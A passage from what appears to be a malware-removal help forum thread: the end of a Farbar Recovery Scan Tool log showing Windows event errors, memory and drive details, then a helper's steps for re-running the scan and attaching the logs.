Faulting application start time: 0x01d3741dbf845230
Faulting application path: C:\Program Files\VIPRE\VIPREUI.exe
Faulting module path: C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\8f60f287a302618931fadffc35cacedd\PresentationCore.ni.dll
Report Id: 0c5217f0-e011-11e7-a3b3-002197c3e0a9

Error: (12/13/2017 06:21:20 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 06:20:29 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 06:17:28 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 06:14:02 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 06:03:44 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 05:12:37 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (12/13/2017 06:29:23 AM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{FB7B3318-7CD1-4E4D-887C-1D71C5647D83}.
The backup browser is stopping.

Error: (12/13/2017 06:27:09 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Agere Modem Call Progress Audio service failed to start due to the following error:
The system cannot find the file specified.

Error: (12/13/2017 05:16:19 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {FE7E09CE-BBF4-4698-8BC1-37C9002DAA43} did not register with DCOM within the required timeout.

Error: (12/13/2017 05:16:26 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The VIPRE Advanced Security service hung on starting.

Error: (12/13/2017 05:11:12 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Agere Modem Call Progress Audio service failed to start due to the following error:
The system cannot find the file specified.

Error: (12/13/2017 05:10:45 AM) (Source: volmgr) (EventID: 46) (User: )
Description: Crash dump initialization failed!

Error: (12/13/2017 05:09:58 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UPnP Device Host service failed to start due to the following error:
The service did not start due to a logon failure.

Error: (12/13/2017 05:09:58 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The upnphost service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
The security account manager (SAM) or local security authority (LSA) server was in the wrong state to perform the security operation.


To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (12/13/2017 05:09:58 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1069" attempting to start the service upnphost with arguments "" in order to run the server:
{204810B9-73B2-11D4-BF42-00B0D0118B56}

Error: (12/13/2017 04:52:06 AM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{FB7B3318-7CD1-4E4D-887C-1D71C5647D83}.
The backup browser is stopping.


==================== Memory info ===========================

Processor: AMD Athlon(tm) Dual Core Processor 4050e
Percentage of memory in use: 46%
Total physical RAM: 2942.49 MB
Available physical RAM: 1578.47 MB
Total Virtual: 5884.98 MB
Available Virtual: 4243.93 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.99 GB) (Free:245.13 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: C9EED053)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=298 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
 

TwinHeadedEagle

Hello,


Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.
  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Make sure that the Addition.txt option is checked.
  • Press the Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please attach the report to your next reply.
 
